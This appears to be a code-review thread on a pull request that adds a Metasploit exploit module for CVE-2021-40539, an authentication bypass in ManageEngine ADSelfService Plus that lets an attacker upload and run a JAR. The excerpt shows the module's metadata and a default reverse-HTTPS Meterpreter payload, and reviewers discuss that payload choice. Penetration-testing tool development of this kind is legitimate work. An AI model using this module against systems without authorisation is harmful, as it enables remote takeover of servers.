modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb

```diff
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',
+        'Description' => %q{
+          This module exploits CVE-2021-40539, a REST API authentication bypass
+          vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and
+          execute it as the user running ADSelfService Plus - which is SYSTEM if
+          started as a service.
+        },
+        'Author' => [
+          # Discovered by unknown threat actors
+          'Antoine Cervoise', # Independent analysis and RCE
+          'Wilfried Bécard', # Independent analysis and RCE
+          'wvu' # Initial analysis and module
+        ],
+        'References' => [
+          ['CVE', '2021-40539'],
+          ['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],
+          ['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],
+          ['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],
+          ['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']
+        ],
+        'DisclosureDate' => '2021-09-07',
+        'License' => MSF_LICENSE,
+        'Platform' => 'java',
+        'Arch' => ARCH_JAVA,
+        'Privileged' => false, # true if ADSelfService Plus is run as a service
+        'Targets' => [
+          ['Java Dropper', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8888,
+          'PAYLOAD' => 'java/meterpreter/reverse_https'
```

Comment:
This doesn't look necessary. The framework automatically selects a default of `java/meterpreter/reverse_tcp` which works.

Reply:
Not necessary but preferred, since the HTTP payload is slightly more advanced. :)

Reply:
For example, HTTPS payloads support a so-called [paranoid mode](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode), which is a combination of other features.

Reply:
Hmm, maybe I was too conservative in #13755.